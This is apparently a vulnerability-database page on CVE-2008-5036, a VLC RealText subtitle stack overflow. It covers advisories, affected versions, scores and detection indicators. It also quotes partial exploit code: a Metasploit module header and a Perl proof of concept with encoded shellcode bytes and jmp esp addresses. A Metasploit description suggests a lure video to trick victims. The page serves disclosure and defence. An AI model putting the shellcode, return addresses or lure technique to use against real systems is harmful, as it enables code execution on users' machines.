CVE-2008-5036
published 2008-11-10CVE-2008-5036: Stack-based buffer overflow in VideoLAN VLC media player 0.9.x before 0.9.6 might allow user-assisted attackers to execute arbitrary code via an an invalid…
PriorityP353critical9.3CVSS 2.0
AVNACMAuNCCICAC
EXPLOIT
EPSS
41.44%
98.5th percentile
Stack-based buffer overflow in VideoLAN VLC media player 0.9.x before 0.9.6 might allow user-assisted attackers to execute arbitrary code via an an invalid RealText (rt) subtitle file, related to the ParseRealText function in modules/demux/subtitle.c. NOTE: this issue was SPLIT from CVE-2008-5032 on 20081110.
Affected
41 ranges· showing 25
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| debian | vlc | < vlc 1.0.3-1 (bookworm) | vlc 1.0.3-1 (bookworm) |
| debian | vlc | < vlc 0.8.6.h-5 (bookworm) | vlc 0.8.6.h-5 (bookworm) |
| videolan | vlc_media_player | — | — |
| videolan | vlc_media_player | — | — |
| videolan | vlc_media_player | — | — |
| videolan | vlc_media_player | — | — |
| videolan | vlc_media_player | — | — |
| videolan | vlc_media_player | — | — |
| videolan | vlc_media_player | — | — |
| videolan | vlc_media_player | — | — |
| videolan | vlc_media_player | — | — |
| videolan | vlc_media_player | — | — |
| videolan | vlc_media_player | — | — |
| videolan | vlc_media_player | — | — |
| videolan | vlc_media_player | — | — |
| videolan | vlc_media_player | — | — |
| videolan | vlc_media_player | — | — |
| videolan | vlc_media_player | — | — |
| videolan | vlc_media_player | — | — |
| videolan | vlc_media_player | — | — |
| videolan | vlc_media_player | — | — |
| videolan | vlc_media_player | — | — |
| videolan | vlc_media_player | — | — |
| videolan | vlc_media_player | — | — |
| videolan | vlc_media_player | — | — |
Detection & IOCsextracted from sources · hover to see the quote
bytes↗
\x81\xc4\x54\xf2\xff\xff (add esp, -3500 stack adjustment prepended to payload)
- →The exploit generates two files: a benign-looking .mp4 lure and a malicious .rt subtitle file; both must be present in the same directory for exploitation. ↗
- →Overflow is triggered inside ParseRealText in modules/demux/subtitle.c; monitor VLC process for stack corruption when parsing .rt files. ↗
- →Bad characters for payload encoding are null byte, double-quote, and newline (\x00\x22\x0a); encoded shellcode in .rt files will avoid these bytes. ↗
- →Stack adjustment stub \x81\xc4\x54\xf2\xff\xff (add esp, -3500) prepended to shellcode; presence in a .rt file is a strong exploit indicator. ↗
- →Affected versions are VLC 0.9.x before 0.9.6; detection should flag VLC versions 0.9.0–0.9.5 parsing .rt subtitle files. ↗
- ·The RealText return address 0x68f0cfad (jmp esp in libqt4_plugin.dll) is specific to VLC 0.9.4 on Windows XP SP3 and Windows 7 SP1; different builds require different gadget addresses. ↗
- ·The standalone PoC uses 0x7c9d30d7 (jmp esp in shell32.dll) which is Windows XP SP3-specific; other OS versions require locating a different jmp esp gadget. ↗
- ·CVE-2008-5036 was split from CVE-2008-5032; CVE-2008-5032 covers the CUE/VCD cdrom.c overflow, while CVE-2008-5036 covers only the RealText subtitle ParseRealText overflow. ↗
CVSS provenance
nvdv2.09.3CRITICALAV:N/AC:M/Au:N/C:C/I:C/A:C
osv9.3CRITICAL
vendor_debian9.3MEDIUM
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
Debian
CVE-2008-5036: vlc - Stack-based buffer overflow in VideoLAN VLC media player 0.9.x before 0.9.6 migh...
vendor_debian·2008·CVSS 9.3
CVE-2008-5036 [CRITICAL] CVE-2008-5036: vlc - Stack-based buffer overflow in VideoLAN VLC media player 0.9.x before 0.9.6 migh...
Stack-based buffer overflow in VideoLAN VLC media player 0.9.x before 0.9.6 might allow user-assisted attackers to execute arbitrary code via an an invalid RealText (rt) subtitle file, related to the ParseRealText function in modules/demux/subtitle.c. NOTE: this issue was SPLIT from CVE-2008-5032 on 20081110.
Scope: local
bookworm: resolved (fixed in 1.0.3-1)
bullseye: resolved (fixed in 1.0.3-1)
forky: resolved (fixed in 1.0.3-1)
sid: resolved (fixed in 1.0.3-1)
trixie: resolved (fixed in 1.0.3-1)
Debian
CVE-2008-5032: vlc - Stack-based buffer overflow in VideoLAN VLC media player 0.5.0 through 0.9.5 mig...
vendor_debian·2008·CVSS 9.3
CVE-2008-5032 [CRITICAL] CVE-2008-5032: vlc - Stack-based buffer overflow in VideoLAN VLC media player 0.5.0 through 0.9.5 mig...
Stack-based buffer overflow in VideoLAN VLC media player 0.5.0 through 0.9.5 might allow user-assisted attackers to execute arbitrary code via the header of an invalid CUE image file, related to modules/access/vcd/cdrom.c. NOTE: this identifier originally included an issue related to RealText, but that issue has been assigned a separate identifier, CVE-2008-5036.
Scope: local
bookworm: resolved (fixed in 0.8.6.h-5)
bullseye: resolved (fixed in 0.8.6.h-5)
forky: resolved (fixed in 0.8.6.h-5)
sid: resolved (fixed in 0.8.6.h-5)
trixie: resolved (fixed in 0.8.6.h-5)
GHSA
GHSA-qr75-p27m-crxr: Stack-based buffer overflow in VideoLAN VLC media player 0
ghsa_unreviewed·2022-05-14·CVSS 9.3
CVE-2008-5036 [CRITICAL] CWE-119 GHSA-qr75-p27m-crxr: Stack-based buffer overflow in VideoLAN VLC media player 0
Stack-based buffer overflow in VideoLAN VLC media player 0.9.x before 0.9.6 might allow user-assisted attackers to execute arbitrary code via an an invalid RealText (rt) subtitle file, related to the ParseRealText function in modules/demux/subtitle.c. NOTE: this issue was SPLIT from CVE-2008-5032 on 20081110.
GHSA
GHSA-jv67-453q-wxm3: Stack-based buffer overflow in VideoLAN VLC media player 0
ghsa_unreviewed·2022-05-14·CVSS 9.3
CVE-2008-5032 [CRITICAL] CWE-119 GHSA-jv67-453q-wxm3: Stack-based buffer overflow in VideoLAN VLC media player 0
Stack-based buffer overflow in VideoLAN VLC media player 0.5.0 through 0.9.5 might allow user-assisted attackers to execute arbitrary code via the header of an invalid CUE image file, related to modules/access/vcd/cdrom.c. NOTE: this identifier originally included an issue related to RealText, but that issue has been assigned a separate identifier, CVE-2008-5036.
OSV
CVE-2008-5032: Stack-based buffer overflow in VideoLAN VLC media player 0
osv·2008-11-10·CVSS 9.3
CVE-2008-5032 [CRITICAL] CVE-2008-5032: Stack-based buffer overflow in VideoLAN VLC media player 0
Stack-based buffer overflow in VideoLAN VLC media player 0.5.0 through 0.9.5 might allow user-assisted attackers to execute arbitrary code via the header of an invalid CUE image file, related to modules/access/vcd/cdrom.c. NOTE: this identifier originally included an issue related to RealText, but that issue has been assigned a separate identifier, CVE-2008-5036.
OSV
CVE-2008-5036: Stack-based buffer overflow in VideoLAN VLC media player 0
osv·2008-11-10·CVSS 9.3
CVE-2008-5036 [CRITICAL] CVE-2008-5036: Stack-based buffer overflow in VideoLAN VLC media player 0
Stack-based buffer overflow in VideoLAN VLC media player 0.9.x before 0.9.6 might allow user-assisted attackers to execute arbitrary code via an an invalid RealText (rt) subtitle file, related to the ParseRealText function in modules/demux/subtitle.c. NOTE: this issue was SPLIT from CVE-2008-5032 on 20081110.
No detection rules found.
Exploit-DB
VideoLAN VLC Media Player 0.9.5 - RealText Subtitle Overflow (Metasploit)
exploitdb·2012-03-02
CVE-2008-5036 VideoLAN VLC Media Player 0.9.5 - RealText Subtitle Overflow (Metasploit)
VideoLAN VLC Media Player 0.9.5 - RealText Subtitle Overflow (Metasploit)
---
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##
require 'msf/core'
class Metasploit3 'VLC Media Player RealText Subtitle Overflow',
'Description' => %q{
This module exploits a stack buffer overflow vulnerability in
VideoLAN VLC MSF_LICENSE,
'Author' =>
[
'Tobias Klein', # Vulnerability Discovery
'SkD', # Exploit
'juan vazquez' # Metasploit Module
],
'Version' => '$Revision: $',
'References' =>
[
[ 'OSVDB', '49809' ],
[ 'CVE', '2008-5036' ],
[ 'BID', '32125' ],
[ 'URL', 'http://www.trapkit.de/advisories/TKADV2008-011.txt' ],
Exploit-DB
VideoLAN VLC Media Player < 0.9.6 - '.rt' Local Stack Buffer Overflow
exploitdb·2008-11-07
CVE-2008-5036 VideoLAN VLC Media Player < 0.9.6 - '.rt' Local Stack Buffer Overflow
VideoLAN VLC Media Player
#
# This should work on a fully up-to-date Windows XP SP3. If you want it to work
# on your OS version, just find a "jmp esp" address in one of the dlls loaded
# with VLC :).
# Have fun. Remember that VLC will open the file .rt automatically with a video
# of the same name (example: s.mov with s.rt in the same folder).
# Credits to Tobias Klein.
# Author has no responsibility over the damage you do with this!
use strict; use warnings;
# win32_exec - EXITFUNC=process CMD=calc.exe Size=338 Encoder=Alpha2 http://metasploit.com
my $shellcode =
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x48\x49\x49\x49".
"\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x51\x5a\x6a\x41".
"\x58\x30\x41\x31\x50\x41\x42\x6b\x41\x41\x51\x41\x32\x41\x41\x32".
"\x42\x41\x30\x42\x41\x
Metasploit
VLC Media Player RealText Subtitle Overflow
metasploit
VLC Media Player RealText Subtitle Overflow
VLC Media Player RealText Subtitle Overflow
This module exploits a stack buffer overflow vulnerability in VideoLAN VLC < 0.9.6. The vulnerability exists in the parsing of RealText subtitle files. In order to exploit this, this module will generate two files: The .mp4 file is used to trick your victim into running. The .rt file is the actual malicious file that triggers the vulnerability, which should be placed under the same directory as the .mp4 file.
No writeups or analysis indexed.
http://git.videolan.org/?p=vlc.git%3Ba=commitdiff%3Bh=e3cef651125701a2e33a8d75b815b3e39681a447http://secunia.com/advisories/32569http://secunia.com/advisories/33315http://security.gentoo.org/glsa/glsa-200812-24.xmlhttp://www.openwall.com/lists/oss-security/2008/11/05/4http://www.openwall.com/lists/oss-security/2008/11/05/5http://www.openwall.com/lists/oss-security/2008/11/10/13http://www.securityfocus.com/archive/1/498111/100/0/threadedhttp://www.securityfocus.com/bid/32125http://www.trapkit.de/advisories/TKADV2008-011.txthttp://www.videolan.org/security/sa0810.htmlhttps://exchange.xforce.ibmcloud.com/vulnerabilities/46376https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A14329https://www.exploit-db.com/exploits/7051http://git.videolan.org/?p=vlc.git%3Ba=commitdiff%3Bh=e3cef651125701a2e33a8d75b815b3e39681a447http://secunia.com/advisories/32569http://secunia.com/advisories/33315http://security.gentoo.org/glsa/glsa-200812-24.xmlhttp://www.openwall.com/lists/oss-security/2008/11/05/4http://www.openwall.com/lists/oss-security/2008/11/05/5http://www.openwall.com/lists/oss-security/2008/11/10/13http://www.securityfocus.com/archive/1/498111/100/0/threadedhttp://www.securityfocus.com/bid/32125http://www.trapkit.de/advisories/TKADV2008-011.txthttp://www.videolan.org/security/sa0810.htmlhttps://exchange.xforce.ibmcloud.com/vulnerabilities/46376https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A14329https://www.exploit-db.com/exploits/7051
2008-11-10
Published